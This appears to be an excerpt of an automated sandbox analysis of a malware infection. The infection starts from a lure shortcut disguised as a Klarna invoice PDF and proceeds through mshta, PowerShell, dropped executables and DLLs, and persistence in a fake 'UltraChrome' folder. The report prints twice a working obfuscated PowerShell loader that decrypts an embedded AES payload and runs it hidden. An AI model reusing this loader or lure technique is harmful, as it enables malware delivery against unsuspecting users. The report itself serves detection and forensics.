            Source: Binary string: sethc.pdb source: mshta.exe, 00000004.00000003.2221900308.000001D04CD61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2247275165.000001D04CD81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2220749210.000001D04CE07000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221325270.000001D048DAA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221436947.000001D04CDC5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\build27\cpython\PCBuild\python27.pdb source: pyexec.exe, 00000012.00000002.2168401639.000000006C25A000.00000002.00000001.01000000.00000014.sdmp, pyexec.exe, 00000012.00000003.2126299220.000000000906F000.00000004.00000001.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2352385789.000000006BC2A000.00000002.00000001.01000000.00000017.sdmp
            Source: Binary string: explorer.pdb source: explorer.exe, 00000016.00000003.2529304928.0000000005595000.00000004.00000001.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '474A3D80681E00D6A2EF8CD9205A8000631C5C73110F4F3F98F9A3380757A56587AC33C982B8757EDE337D31FE178A5C76E820250B09678E60E099A6640F0003AD5BA580D4079FF31BFB3624F9936FF7E054A6F5E6ADF16AF70F2E258B230F0E119433E36E3EA1E08ACE300686446DBFFA1718086C874FC8A8A09ECE0BFD5827E2193AF83B13A9484213EC696E93EAD4E5C86D3B340D0383DF19D9C6B9177B473A715691E727DD59FAD481BB49CFEA164A8C8A2491D767B90BD1F1A11FC199A39158AB0C73865F35115CBBE29DBEC488B90B0DC061AD5039FE414583BD0E8BD4E7B7672D629DE366DBFAED2D2883ABA50A9A3E095A1B26777F10398DF92E050D286E806395A5648C371F95E62603829AB9CCCACC87BA02D01A00AFE9838ECF66997E0A551A83FFD859BBA6E2E568E9EDF081936A8569161CB274B3B9FC21427BBFF2D5D3CF500872D4A683668F2BA8C3038B93718EE8317DBCCA6305CD634DD1B2335210DC703C66A2F0B81A0128C9E257E324E61A18DA3ABFD1FF42A8E1E1E8F1E7A7E412839AAE35575C1AB8B6072F3F101F284610A7A9532CE85C597BD62A5F4DEB11490AF74CF21ECB396C3208FB1E2589B5CE209FFE1017BD9C5FAECDA99ACB77A243D50657551D5D47F459F8E119B10653DCCB3289C76C9277136D22F53A69199D62D4FFD4041CF72E1A171243BD2074D940A15228E8513CE7A56D65D8EC952DA1892A1C0DD32267424040F32729D596424618D14BC5778CA69A50F5378CE90DD67BF9999C530599FA84EEDF1437CAD4599F3B7A5E7C715AF39F96B02950C66C2C6BA86E0CA9B675D12FDB087692B5AAB0023D114DDA9F406E075D82EBF2F19297D6F614E17214DB113946B455BD69B36718F5E9FDD59B17F24ADE82623F8E02D3779A8A68B9AD01E429B87EFA6E75E2447F0911F56F9765C959A678DCB2037D736BE2BEBFAA18D5CD0E5D31518F484AA55F2B977C501125F80803041206588BADA41525EE9B8028EA58781C70961A6BB0694F09DA35A160ED1AE70FB8C2E6354A6F03BFC8C02611C83AD60917171564EB342465A947A75C12850F40B68C68DF9C5D83328A98798B17DBEA519B0CE39850F7D8E390584FED55BE5059CA71D2719A0D9B3575AD4DA7287E4D5C5F7EFBA6CC3A3F7F4BCD13AC1249B159691B69F1D64638B49A4BB7A28DA57B77892D7E8F00A1D56280ACF19657E31A66DFC23FBA50CFDA53B25280E96E1FBF839A922391F2D69B1839C422568935D9A35EB45649512E2FDFF02BB416951E3F123183CA94CCFCCB683F885C28A6612BE81855A88151A9D947C889DF4B8536261DCAAD58C911647AB6B0D09AAE2E7F0815EF1890124C736FB150D2551F0419A04AA7E0C0AA8A883CD43E6C794BCACCAFBDC6CEA95B925F072D8EC8D52F266541A22E74F87228F055F2EC79DE196F94BD5C59D029B1320B41AAF44D624365A3C1EC5F6B716D4A575948474E4552594C66474E';function cZF ($PgTDvwwB){return -split ($PgTDvwwB -replace '..', '0x$& ')};$kvsOmI = cZF($ddg.SubString(0, 2080));$qlR = [System.Security.Cryptography.Aes]::Create();$qlR.Key = cZF($ddg.SubString(2080));$qlR.IV = New-Object byte[] 16;$GluWYuA = $qlR.CreateDecryptor();$ZwjPYT = [System.String]::new($GluWYuA.TransformFinalBlock($kvsOmI, 0,$kvsOmI.Length)); sal fd $ZwjPYT.Substring(3,3); fd $ZwjPYT.Substring(6)
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '474A3D80681E00D6A2EF8CD9205A8000631C5C73110F4F3F98F9A3380757A56587AC33C982B8757EDE337D31FE178A5C76E820250B09678E60E099A6640F0003AD5BA580D4079FF31BFB3624F9936FF7E054A6F5E6ADF16AF70F2E258B230F0E119433E36E3EA1E08ACE300686446DBFFA1718086C874FC8A8A09ECE0BFD5827E2193AF83B13A9484213EC696E93EAD4E5C86D3B340D0383DF19D9C6B9177B473A715691E727DD59FAD481BB49CFEA164A8C8A2491D767B90BD1F1A11FC199A39158AB0C73865F35115CBBE29DBEC488B90B0DC061AD5039FE414583BD0E8BD4E7B7672D629DE366DBFAED2D2883ABA50A9A3E095A1B26777F10398DF92E050D286E806395A5648C371F95E62603829AB9CCCACC87BA02D01A00AFE9838ECF66997E0A551A83FFD859BBA6E2E568E9EDF081936A8569161CB274B3B9FC21427BBFF2D5D3CF500872D4A683668F2BA8C3038B93718EE8317DBCCA6305CD634DD1B2335210DC703C66A2F0B81A0128C9E257E324E61A18DA3ABFD1FF42A8E1E1E8F1E7A7E412839AAE35575C1AB8B6072F3F101F284610A7A9532CE85C597BD62A5F4DEB11490AF74CF21ECB396C3208FB1E2589B5CE209FFE1017BD9C5FAECDA99ACB77A243D50657551D5D47F459F8E119B10653DCCB3289C76C9277136D22F53A69199D62D4FFD4041CF72E1A171243BD2074D940A15228E8513CE7A56D65D8EC952DA1892A1C0DD32267424040F32729D596424618D14BC5778CA69A50F5378CE90DD67BF9999C530599FA84EEDF1437CAD4599F3B7A5E7C715AF39F96B02950C66C2C6BA86E0CA9B675D12FDB087692B5AAB0023D114DDA9F406E075D82EBF2F19297D6F614E17214DB113946B455BD69B36718F5E9FDD59B17F24ADE82623F8E02D3779A8A68B9AD01E429B87EFA6E75E2447F0911F56F9765C959A678DCB2037D736BE2BEBFAA18D5CD0E5D31518F484AA55F2B977C501125F80803041206588BADA41525EE9B8028EA58781C70961A6BB0694F09DA35A160ED1AE70FB8C2E6354A6F03BFC8C02611C83AD60917171564EB342465A947A75C12850F40B68C68DF9C5D83328A98798B17DBEA519B0CE39850F7D8E390584FED55BE5059CA71D2719A0D9B3575AD4DA7287E4D5C5F7EFBA6CC3A3F7F4BCD13AC1249B159691B69F1D64638B49A4BB7A28DA57B77892D7E8F00A1D56280ACF19657E31A66DFC23FBA50CFDA53B25280E96E1FBF839A922391F2D69B1839C422568935D9A35EB45649512E2FDFF02BB416951E3F123183CA94CCFCCB683F885C28A6612BE81855A88151A9D947C889DF4B8536261DCAAD58C911647AB6B0D09AAE2E7F0815EF1890124C736FB150D2551F0419A04AA7E0C0AA8A883CD43E6C794BCACCAFBDC6CEA95B925F072D8EC8D52F266541A22E74F87228F055F2EC79DE196F94BD5C59D029B1320B41AAF44D624365A3C1EC5F6B716D4A575948474E4552594C66474E';function cZF ($PgTDvwwB){return -split ($PgTDvwwB -replace '..', '0x$& ')};$kvsOmI = cZF($ddg.SubString(0, 2080));$qlR = [System.Security.Cryptography.Aes]::Create();$qlR.Key = cZF($ddg.SubString(2080));$qlR.IV = New-Object byte[] 16;$GluWYuA = $qlR.CreateDecryptor();$ZwjPYT = [System.String]::new($GluWYuA.TransformFinalBlock($kvsOmI, 0,$kvsOmI.Length)); sal fd $ZwjPYT.Substring(3,3); fd $ZwjPYT.Substring(6)Jump to behavior
            Source: Headerfrontend[1].4.drStatic PE information: 0x9EF0B9FD [Thu Jul 2 03:39:41 2054 UTC]
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_10042400 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_10042400
            Source: python27.dll.17.drStatic PE information: real checksum: 0x29675c should be: 0x28d832
            Source: python27.dll.18.drStatic PE information: real checksum: 0x29675c should be: 0x28d832
            Source: IMAKBWPY.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x2d9dc1
            Source: Headerfrontend[1].4.drStatic PE information: real checksum: 0x1f27b should be: 0x71793
            Source: IMAKBWPY.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x2f869d
            Source: ryuvnp.20.drStatic PE information: real checksum: 0x0 should be: 0x49c63
            Source: Gloom.dll.17.drStatic PE information: real checksum: 0x0 should be: 0x7b57b
            Source: pyexec.exe.18.drStatic PE information: real checksum: 0x7592 should be: 0x73ad
            Source: pyexec.exe.17.drStatic PE information: real checksum: 0x7592 should be: 0x73ad
            Source: Headerfrontend[1].4.drStatic PE information: section name: .didat
            Source: IMAKBWPY.exe.6.drStatic PE information: section name: .wixburn
            Source: IMAKBWPY.exe.16.drStatic PE information: section name: .wixburn
            Source: ryuvnp.20.drStatic PE information: section name: nfrkk
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9A9A7FEA push ebx; retf 0009h6_2_00007FFD9A9A801A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9A9A15A5 pushad ; ret 6_2_00007FFD9A9A160D
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009CEAD6 push ecx; ret 16_2_009CEAE9
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0025EAD6 push ecx; ret 17_2_0025EAE9
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_1003AE90 push eax; ret 17_2_1003AEBE
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: 18_2_00402F71 push ecx; ret 18_2_00402F84
            Source: msvcr90.dll.17.drStatic PE information: section name: .text entropy: 6.9217598022130655
            Source: msvcr90.dll.18.drStatic PE information: section name: .text entropy: 6.9217598022130655

            Persistence and Installation Behavior

            barindex
            Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
            Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
            Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
            Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
            Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeFile created: C:\Users\user\AppData\Roaming\UltraChrome\python27.dllJump to dropped file
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeFile created: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\python27.dllJump to dropped file
            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Headerfrontend[1]Jump to dropped file
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeFile created: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\msvcr90.dllJump to dropped file
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeFile created: C:\Users\user\AppData\Roaming\UltraChrome\msvcr90.dllJump to dropped file
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeFile created: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\Gloom.dllJump to dropped file
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeFile created: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeJump to dropped file
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeFile created: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\ryuvnpJump to dropped file
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeFile created: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\IMAKBWPY.exeJump to dropped file
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeFile created: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\python27.dllJump to dropped file
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeFile created: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\msvcr90.dllJump to dropped file
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeFile created: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\Gloom.dllJump to dropped file
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeFile created: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeFile created: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeJump to dropped file
            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Headerfrontend[1]Jump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\ryuvnpJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\RYUVNP
            Source: Possible double extension: pdf.lnkStatic PE information: KlarnaInvoice229837.pdf.lnk
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
